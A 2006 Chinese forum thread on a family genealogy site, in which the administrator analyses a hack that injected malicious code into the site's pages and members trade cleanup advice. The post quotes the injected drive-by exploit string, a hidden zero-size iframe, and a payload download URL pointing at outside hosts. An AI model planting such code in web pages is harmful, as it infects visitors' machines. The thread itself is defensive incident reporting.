开启左侧

[原创]五月四日网站病毒剖析

楼主
袁氏家谱 发表于 2006-5-8 16:25:00 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

欢迎注册登录后浏览更多内容!谢谢!

您需要 登录 才可以下载或查看,没有帐号?注册

x
据守信、小达报道:5月4日以后,我们网站出现了木马病毒,5月6号回来后,我立刻展开了调查,事情如下:
1、病毒为骇客类,侵入了网站修改了网页代码,在网页上加上了如下代码: CodeBase: mk:%40MSITStore%3Amhtml%3Ac%3A\%2Emht%21http://bbs.gemeus.com/q17%2f1.js::/%23.exe
     CLSID: {00000000-0000-0000-0000-000000000000}
     Extension:
     Type: application/x-oleobject
也就是说,捣鬼的网站是http://bbs.gemeus.com/q17%2f1.js::/%23.exe
捣鬼的文件是q17%2f1.js::/%23.exe
2、经过查看临时文件夹,木马病毒将病毒文件寄放在临时文件夹下,妄想运行时,被我的天网防火墙阻止了。在临时文件夹下的几个文件名是:
1.exe
1.js
ah.js
CAY9GX8D.HTM
setup_jt.exe.txt
3、如果大家用三个热键查看进程,其中有上述文件,请结束进程,杀毒。
4、记得病毒当时提示,要把网上文件下载到windows目录下的Downloaded Program Files进行安装,其文件名为:#.exe
5、[update]
num=22
url=http://222.88.88.191/setup_jt.exe
这是病毒更新文件
6、如果5月4号到7号间曾打开过袁氏家谱网站或论坛的朋友,请杀毒。
7、这家伙在我网页尾加上了这样的语句:
<iframe src="http://bbs.gemeus.com/q17/index.htm"width="0" height="0"></iframe>
弹出一个窗口,其内容指向这个论坛。
----这是很不道德的宣传自己论坛的做法。人皆诛之。
分享到:  微信微信 QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏 转播转播 分享分享 支持支持 反对反对

沙发
袁冠烛 发表于 2006-5-8 16:39:00 | 只看该作者

真是太可恶了!大家要提高警惕才是。

真是太可恶了!大家要提高警惕才是。

板凳
丁九一 发表于 2006-5-10 00:24:00 | 只看该作者

哦,原来是这样.前几天就是无法登录咱们网...

哦,原来是这样.前几天就是无法登录咱们网站.我用江民软件杀了!谢谢大家.

地板
袁在田 发表于 2006-5-10 08:30:00 | 只看该作者

太可恶了!那几天我这能上,但找不到各个栏...

太可恶了!那几天我这能上,但找不到各个栏目,我还以为论坛在维护呢。老论坛曾受攻击,守信忙乎了一星期。大家一定要提高警惕,有情况及时向管理员报告。

袁焕文 发表于 2006-5-10 21:00:00 | 只看该作者

我的电脑中毒了!就是那天我打开网站后,我...

我的电脑中毒了!就是那天我打开网站后,我的电脑有警报,可是就是杀不出来!每次都有警报,怎么办呀??

袁资友 发表于 2006-5-11 17:02:00 | 只看该作者

除了用杀毒软件外,建议1、安装超级兔...

除了用杀毒软件外,建议
1、安装超级兔子软件,对电脑垃圾文件进行清理,对注册表进行清理,
2、安装瑞星的KAKA软件,对电脑进行保护,
3、用杀毒软件杀一次毒,
4、也可在线查毒,你如果对电脑系统文件较熟悉,可以把有毒的文件用资源管理器直接删除
5、注意:直接删除文件,搞得不好会使电脑系统崩溃,务必小心!
6、对电脑运行的常用进程记住,到时候抓一幅图,发到QQ群上,请大家分析一下,哪是毒,哪不是毒。

卧龙深处 发表于 2006-5-11 21:15:00 | 只看该作者

现在下载瑞星可装不上。

现在下载瑞星可装不上。

丁九一 发表于 2006-6-9 00:21:00 | 只看该作者

大家使用电脑,什么软件都可以装盗版(不支...

大家使用电脑,什么软件都可以装盗版(不支持),唯独杀毒软件一定要用正版的,是购买的带光盘的,而且要经常升级(每天一次),网路上DOWN的杀毒软件可能会出问题吧(我没DOWN过),要保持高度警惕.

资友 发表于 2006-6-16 09:17:00 | 只看该作者

经过这一阵观察,没有病毒,我认为:...

经过这一阵观察,没有病毒,我认为:
  前段时间我们网站代码被加入指向代码的程序是人为的,可能的原因是,我们管理群中,有三人QQ被盗,贼人可能通过聊天记录看到了我们管理员登录的密码和帐号,顺利进去加入的非法链接。
  我经过修改网站密码后半个多月来,没有发现问题,充分说明了这一点。
-----------------------------
  最后提供管理员管好自己的QQ,用手机或邮件绑一下。尽量不上网吧上网,如果去了,回来后把密码改一下。以防造成QQ被盗。

袁冠烛 发表于 2006-6-16 11:01:00 | 只看该作者

我的还是有那个问题,登录后换面就没了.怎...

我的还是有那个问题,登录后换面就没了.怎么办?谁帮我!